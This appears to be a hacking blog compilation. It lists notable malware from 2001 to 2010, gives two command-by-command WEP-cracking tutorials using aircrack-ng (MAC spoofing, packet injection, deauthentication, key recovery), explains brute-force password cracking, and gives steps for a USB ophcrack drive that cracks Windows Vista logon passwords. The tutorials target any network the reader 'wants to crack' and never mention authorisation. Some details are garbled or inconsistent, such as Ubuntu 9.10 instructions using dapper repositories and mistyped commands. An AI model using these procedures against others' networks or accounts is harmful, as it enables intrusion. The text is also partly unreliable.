10 most dangerous computer virus known so far

Computer virus has been considered as the biggest problem in Computer & Tech world and it is also giving tension to each & every person who uses computer and that's why it is very important to know about the Most Dangerous Computer Viruses of 2001 to 2010 to make your computer more safer. To download a computer virus one simply needed to click on a certain link or open an email attachment.

But before starting I would like suggest you to read about the about the Top 7 Most Dangerous Computer Viruses of the 20th Century.

1. Sadmind worm (2001)
ALIAS: Sadmind/IIS, Unix/Sadmind, Solaris/Sadmind.worm
The Sadmind worm was a self-propagating piece of malware, It was first discovered on May 8, 2001 in china. Sadmind is designed to provide remote system administration operations and is installed by default with many versions of the Sun Microsystems operating system.
It affected some big operating systems like Sun Microsystems Solaris(OS) and Microsoft's Internet Information Services (IIS) which is the world's second most popular web server in terms of overall websites behind the industry leader Apache HTTP Server.

2. Beast Trojan (2002)
Beast is a Windows-based backdoor trojan horse more commonly known in the underground cracker community as a RAT (Remote Administration Tool). It was created in Delphi and released first by its author Tataye in 2002. Beast was one of the first trojans to feature a 'reverse connection' to its victims and once established, it gave the attacker complete control over the infected computer.

Once connected to the victim computer, via Beast hacker can access victim's all computer file and directories along with the power to upload, download, delete or execute any file or folder.

3. SQL Slammer (2003)
ALIAS: Sapphire, Worm.SQL.Helkern, SQLSlammer

Appeared first in 27th January 2003 and soon got a high rank in the list of most dangerous worms of the year because it is the first fileless worm. Slammer was able to spread by taking advantage of the vulnerability found in the SQL Server.
Slammer spread to over 90 percent of all vulnerable hosts in 10 minutes and infected around 359,000 computers total and according to London-based market intelligence the worm caused between $950 million and $1.2 billion in lost productivity in its first five days worldwide.
4. Sasser (2004)
Sasser is an Internet worm that probably caused around $18.1 billions of dollars of damage in 2004. It was created by a Computer science student, Sven Jaschan in Germany first seen on last day of april. While there was no intentionally destructive payload, Sasser did cause many computers to slow down or crash, causing some high profile damage.
And was destructive enough to shut down the satellite communications for some French news agencies. It also resulted in the cancellation of several Delta airline flights and the shutdown of numerous companies’ systems worldwide.

5. Bandook (2005)
ALIAS: Bandook Rat
Bandook Rat is a backdoor trojan horse that infects Windows NT family systems (Windows 2000, XP, 2003, Vista). It uses a server creator, a client and a server to take control over the remote computer. It uses process hijacking / Kernel Patching to bypass the firewall, and allow the server component to hijack processes and gain rights for accessing the internet. It is somehow very similar to Beast Trojan (2002)

6. Nyxem (2006)
ALIAS: Mywife, Hunchi, I-Worm.Nyxem, Blackmal, Blueworm, Blackworm
Nyxem worm was first found on March, 2006. The worm spreads in e-mails using an external SMTP engine. It sends itself with different subjects, body text and attachment names. The worm also copies itself multiple times to an infected hard drive. Blackworm is designed to corrupt data on infected computers on February 3, 2006, in respect to The Day the Music Died.

The most scary thing in this worm is, It can deletes your antivirus programs, if they are installed in the same directories as the ones specified in the worm's code. It can also delete the entries in the Windows Registry belonging to these antivirus programs, so these applications will not be run automatically the next time Windows is started.
The worm also contains one GIF file which is used to make a recipient of infected e-mails think that the message was scanned by Norton Anti-Virus and no infection was found.

But its havoc ended soon and it gone off the records after October 26.

7. Storm Worm (2007)
ALIAS: Small.dam, Trojan.Peacomm, Trojan.Peed, Trojan.Tibs, W32/ZhelatinBut soon after the Nyxem ended, a new virus has been discovered on January 17, 2007 named Storm Worm having the same functionality as Nyxem, It hides himself in a email attachments that had the following title line: "230 dead as storm batters Europe."  Users that opened the attachment let the virus come in their machines. This virus infected around 10 million computers worldwide and after the computer is infected it could be used to launch millions of spam emails that would advertise Web links.
But it has also got some new features of stealing identity and according to the United States Federal Bureau of Investigation the Storm highly helped hackers in bank fraud, identity theft, and a number of other cybercrimes.

8. Conficker (2008)
ALIAS: Downup, Downadup, Kido
Conficker is a computer worm targeting the Microsoft Windows operating system that was first detected 20th November 2008 affected more than seven million government, business and home computers in over 200 countries.
The worm attacks the Microsoft vulnerability MS08-067 in Server Service which allows remote code execution. This vulnerability allows a remote attacker to run arbitrary code on the machine without authentication and take full control of the computer. Second, Conficker Worm uses the infected machine computing power to execute password brute force attacks to crack administrator passwords in the local network. This will allow the worm to spread through network shares as well.
The worm is said to have caused 9.1 billion in damage, mostly in Asia, South America and Europe.
New versions of Conficker came with the power to
-Blocks DNS lookups.
-Disables AutoUpdate.
-Kills anti-malware.
-Scans for and terminates processes with names of anti-malware, patch or diagnostic utilities at one-second intervals.
Microsoft sets a bounty of $250,000 USD for information leading to the capture of the worm's author(s).

9. Daprosy Worm (2009)
Daprosy was first observed in early May 2009 and first announced to public as Daprosy trojan worm by Symantec on July 2009 . This worm is a malicious computer program that spreads via LAN connections, spammed e-mails and USB mass storage devices. Infection comes from a single read1st.exe filewhere several dozens of clones are created at once bearing the names of compromised folders. The most obvious symptom of Daprosy infection is the presence of Classified.exe or Do not open - secrets!.exe files from infected folders.
The worm is known to destabilize, corrupt and even stall the operating system due to programming bugs. It appears that it is incomplete and was probably created by students or amateur Visual Basic programmers. As of October 2009 special scripts are available to remove it from infected computers but till then many Windows system were stalled.

10. Alureon (2010)
Alureon is a trojan and rootkit which is designed to steal data by intercepting a system's network traffic and searching it for usernames, passwords and credit card data. Microsoft has confirmed that Alureon is the cause of a series of BSoD problems on Windows systems which were triggered by Patch Tuesday update MS10-015. Microsoft will not install the patch on these systems. The Alureon rootkit was first seen in 2006 and now started affecting computers.
PCs become infected by downloading software also particularly off torrent sites and visiting certain posting sites.

How to crack a WEP encryption key using BACK TRACK 4 linux destro

Back Track 4 is a very cool linux based destro which is meant for penetration testing and wireless hacking.
It comes with hundreds of installed tools needed for wireless hacking.
To perform this hack you need a compatible wi-fi card which is capable of packet injection(it will speedup the process)

Crack That WEP

To crack WEP, you'll need to launch Konsole, BackTrack's built-in command line. It's right there on the taskbar in the lower left corner, second button to the right. Now, the commands.
First run the following to get a list of your network interfaces:
airmon-ng
The only one I've got there is labeled ra0. Yours may be different; take note of the label and write it down. From here on in, substitute it in everywhere a command includes (interface).
Now, run the following four commands. See the output that I got for them in the screenshot below.

airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

f you don't get the same results from these commands as pictured here, most likely your network adapter won't work with this particular crack. If you do, you've successfully "faked" a new MAC address on your network interface, 00:11:22:33:44:55.

Now it's time to pick your network. Run:
airodump-ng (interface)
To see a list of wireless networks around you. When you see the one you want, hit Ctrl+C to stop the list. Highlight the row pertaining to the network of interest, and take note of two things: its BSSID and its channel (in the column labeled CH), as pictured below. Obviously the network you want to crack should have WEP encryption (in the ENC) column, not WPA or anything else.
ike I said, hit Ctrl+C to stop this listing. (I had to do this once or twice to find the network I was looking for.) Once you've got it, highlight the BSSID and copy it to your clipboard for reuse in the upcoming commands.

Now we're going to watch what's going on with that network you chose and capture that information to a file. Run:
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to clipboard. You can use the Shift+Insert key combination to paste it into the command. Enter anything descriptive for (file name). I chose "yoyo," which is the network's name I'm cracking
You'll get output like what's in the window in the background pictured below. Leave that one be. Open a new Konsole window in the foreground, and enter this command:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
Here the ESSID is the access point's SSID name, which in my case is yoyo. What you want to get after this command is the reassuring "Association successful" message with that smiley face.

You're almost there. Now it's time for:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
Here we're creating router traffic to capture more throughput faster to speed up our crack. After a few minutes, that front window will start going crazy with read/write packets. (Also, I was unable to surf the web with the yoyo network on a separate computer while this was going on.) Here's the part where you might have to grab yourself a cup of coffee or take a walk. Basically you want to wait until enough data has been collected to run your crack. Watch the number in the "#Data" column—you want it to go above 10,000. (Pictured below it's only at 854.)
Depending on the power of your network (mine is inexplicably low at -32 in that screenshot, even though the yoyo AP was in the same room as my adapter), this process could take some time. Wait until that #Data goes over 10k, though—because the crack won't work if it doesn't. In fact, you may need more than 10k, though that seems to be a working threshold for many.
Once you've collected enough data, it's the moment of truth. Launch a third Konsole window and run the following to crack that data you've collected:
aircrack-ng -b (bssid) (file name-01.cap)
Here the filename should be whatever you entered above for (file name). You can browse to your Home directory to see it; it's the one with .cap as the extension.
If you didn't get enough data, aircrack will fail and tell you to try again with more.

How to hack wireless WEP key encyption using ubuntu 9.10

Wireless WEP key encryption has many loopholes which can be cracked using some basics of networking. In this tutorial i am going ho tell how to crack a wep key encryption. I am using Ubuntu 9.10 which is very cool and flexible destro of Linux.

Next, install the extra repositories and all the programs that Ubuntu doesn’t preinstall. Make sure your machine is able to establish a connection to the Internet. If you can only connect via wireless and are having problems, there is a package called Wi-Fi radar that is helpful. To install the extra repositories, open a terminal window and type the following:

sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup
sudo gedit /etc/apt/sources.list

While in the editor, replace everything with:

## Add comments (##) in front of any line to remove it from being checked.
## Use the following sources.list at your own risk.
deb http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse

## MAJOR BUG FIX UPDATES produced after the final release
deb http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse

## UBUNTU SECURITY UPDATES
deb http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse
deb-src http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse

## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse

## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free
deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free

Save the file and exit the text editor. Next type the command:

sudo apt-get update

Now we have to install the packages we’ll need later on:

sudo apt-get install build-essential
sudo apt-get install aircrack
sudo apt-get install kismet
sudo apt-get install airsnort
sudo apt-get install linux-source
sudo apt-get install linux-headers
sudo apt-get install sharutils

Next, you should update your entire system by going to the System Menu>Administration>Update Manager. Click ‘Check’ and begin installing updates. Then reboot your system. After this is done, it’s time to patch the Madwifi drivers.

This is where everything can be tricky. My wireless card (Linksys WPC55AG) uses the Atheros driver, which I needed to patch. If you have a different driver, you’re going to need to find out whether or not you need to patch your drivers, or if they’ll even work with the Aircrack suite. The forums at aircrack-ng.org are a good place to look and so is a Google search. If you have an Atheros card, it will be called ath0 when you type iwconfig in the terminal window, or there will be a line that says Ethernet controller: Atheros Communications… when you type lspci in the terminal.

Let’s apply the madwifi patch which you’ll need if you’re using the Atheros driver. This will temporarily disable your wireless card when it deletes the old drivers of the disk. First we’re going to navigate to the /usr/src directory, download the new drivers, delete the old drivers, then install the new ones and apply the patch. You can just copy and paste the commands below into the terminal or type them yourself. So. first, let’s get the patch and then get the corresponding version of the driver

sudo -i

cd /usr/src

get http://patches.aircrack-ng.org/madwifi-ng-r1679.patch

wget http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r1679-20060707.tar.gz

ifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name ‘ath*’ -exec rm -v {} \;
find /lib/modules -name ‘wlan*’ -exec rm -v {} \;

# tar zxvf madwifi-ng-r1679-20060707.tar.gz
# cd madwifi-ng-r1679-20060707/
# patch -Np1 -i ../madwifi-ng-r1679.patch
# make
# make install
# mod_probe ath_pci

NOTE: Some people have been having problems with the modprobe command. A comment below contains a fix in some cases:

However, during Madwifi Installation I got this warning:

Warning: could not find /usr/src/madwifi/ath_hal/.hal.o.cmd for /usr/src/madwifi/ath_hal/hal.o

This warning can be IGNORED.

When I ran “modprobe ath_pci” it gave me an error message and “dmesg” gave me some gibberish about “disagrees about version of symbol”.

I browsed the web and found the solution: You have to delete the linux-restricted modules. Just search for “linux-restricted” in Synaptic. I removed everything but “linux-restricted-modules-common”. Then I compiled the madwifi again and ran “modeprobe ath_pci” again. NO ERROR this time! Authenticating and injecting works!

Apparently some network cards with atheros chipset cause problems if you don’t remove the linux-restricdet-modules.

If you are using the Atheros driver, next we need to configure kismet to use the right source. If you are using another driver you’ll have to look up what syntax you use. First navigate to the Kismet config, then change the source line.

sudo gedit /etc/kismet/kismet.conf

Change the line that begins with ’source=’ to ’source=madwifi_ag,ath0,madwifi’. Now reboot the computer. After it boots back up you should be able to access the internet again via your wireless card.

Now we can begin cracking. Open up a terminal window, enter monitor mode, and run kismet.

sudo airmon start ath0
sudo kismet

Locate the wireless network you want to crack, and note its ESSID and channel. Then exit by pressing Ctrl-C.

Next, run airodump.

sudo airodump ath0 filename channel# 1

The one at the end lets Airodump know we only want to capture IV’s. The filename can be anything you want, and will be saved in your home directory (or whatever directory you run the command from) as filename.ivs.

Copy the bssid of the wireless network from the airodump window by selecting it and pressing Shift+Ctrl+C. Open up a new terminal window so we can run aireplay to start injecting packets so our data count goes up. We want the data column in airodump to reach between 100,000 and 400,000. The more packets we have, the faster aircrack can find the WEP key. If the WEP key is 128 bits, we may need up to 1,000,000 packets.

sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0

This should associate the network with the wireless connection. If it times out repeatedly, you need to be closer to the wireless router or change your interface rate by typing ’sudo iwconfig ath0 rate 1M’.

Next we want to start injecting packets.

sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0

At first, it will only read packets, and say 0 ARP requests and 0 packets sent. Just wait a minute or two and it will start sending packets in large quantities. If it returns text that says it has been deauthorized, press Ctrl+C and run the command again. You can try to speed things up by entering this command:

sudo aireplay -0 ath0 -a BSSID ath0

Otherwise just sit back and wait. As soon as packets begin to be sent, the data field in Airodump should start flying. Wait until the desired number of packets have been recieved, then open a new terminal window and run aircrack.

sudo aircrack filename.ivs

After a minute, aircrack should return the WEP key. If it doesn’t, collect more packets.

How does Brute force attack works for cracking passwords?

Brute Force Attack is the most widely known password cracking method. This attack simply tries to use every possible character combination as a password. To recover a one-character password it is enough to try 26 combinations (‘a’ to ‘z’). It is guaranteed that you will find the password.. but when? How long will it take? The two-character password will require 26*26=676 combinations. The number of possible combinations (and therefore required time) grows rapidly as the length of the password increases and this method quickly becomes useless. Do you ready to wait for two months while your 9-character password is cracked? What about one hundred years for an 11-character password? Besides the maximal length of the character set you should also specify the character set i.e. the list of characters that will be included in the combinations. The longer the character set is, the longer the required period of time is. Here is the problem: usually you have no idea of what characters are present in the password. On the one hand, you should specify all possible characters. On the other hand, this can slow things down very much. Unfortunately, there are no common ways to determine what character set to use. It is more a question of luck and intuition. The only thing I can recommend is to begin with trying short passwords using the full character set. Then you can increase the length of password simultaneously decreasing the character set to keep the required time good acceptable.
If the password is case sensitive (this is the most common situation), there is another problem with the case.
There are three options:
1) you can assume that the password was typed in lower case (this is most likely). In this case, the required time will stay the same but if the password contains upper case letters it will not be recovered.
2) you can try all combinations.
The password is guaranteed to be found, but the process slows down significantly.  A 7-character lower case password requires about 4 hours to be recovered but if you would like to try all combinations of upper case and lower case letters, it will require 23 days. 3) The third method is trade-off. Only the most probable combinations are taken into consideration, for example "password", "PASSWORD" and "Password". The complicated combinations like "pAssWOrD" are not. In this particular case the process slows down to one third of original speed but there is still a possibility to fail.
You can reduce the amount of time required using faster computers (only the CPU speed is important. The amount of RAM, the performance of the hard drive and other hardware don’t affect the brute force speed), using several computers, choosing the fastest password crackers or tuning the brute force parameters wisely and accurately.
JOHN THE RIPPER is one the most popular tool used for brute force attack.
The table below shows the time required for Brute Force Attack depending on the password length and used character set. It is assumed that the attack is carried out on a single computer and the brute force speed is 500 000 passwords per second.

Length of the password Character set
lowercase letters lowercase letters and digits Both lowercase and uppercase letters all printable ASCII characters
< = 4 instant 2 min
5 instant 2 min 12 min 4 hours
6 10 min 72 min 10 hours 18 days
7 4 hours 43 hours 23 days 4 years
8 4 days 65 days 3 years 463 years
9 4 months 6 years 178 years 44530 years
10 \
Bear in mind that the time shown above is the worst possible time. Brute Force Attack tries all password combinations and you don’t know which one of them is correct. If you’re lucky enough, the first combination will succeed. If not, the correct combination will be tried last.
If you are not afraid of formulas: the required time is equal to (C^L) / S / N, where C is the length of the character set, L is the length of the password, S is the number of password checked per second, and N is the number of computers used in password recovery.

How to Crack windows vista logon password using usb-ophcrack

Security is being a major issue for windows operating system. In windows vista to improve its logon security its Logon password is encrypted using NTLM hashing algorithm  which is a one way hashing algorithm it means that the encrypted string can't be decrypted back to its original string.
But still there is a way to crack windows vista logon password.  OPHCRACK  is a powerful windwos logon password recovery tool which can be downloaded from here.

HOW DOES IT WORK?
Windows logon password is stored in sam file which is found in C:\Windows\System32\config but that password is in the encrypted format (using NTLM algorithm). This Sam file can not be modified or opened in windows environment. OPHCRACK is a live-cd with linux kernal which access the sam file and uses rainbow tables to crack the windows logon password.

using some hack we can use OPHCRACk with a usb drive

Step1:-  Download usboph.Zip
Step2:-  Extract this zip file in a folder and put ophcrack in that folder.

Step3:-  Execute fixoph.bat and follow the onscreen instruction.

Step4:- Now copy all  files to usb drive and execute makeboot.bat

NOTE:- DO NOT EXECUTE THIS FILE IN YOUR COMPUTER HARD DISK OTHERWISE IT WILL OVERWRITE MBR(MASTER BOOT RECORD)
Step5:-  Now your usb drive is prepare for cacking any windows vista logon password.
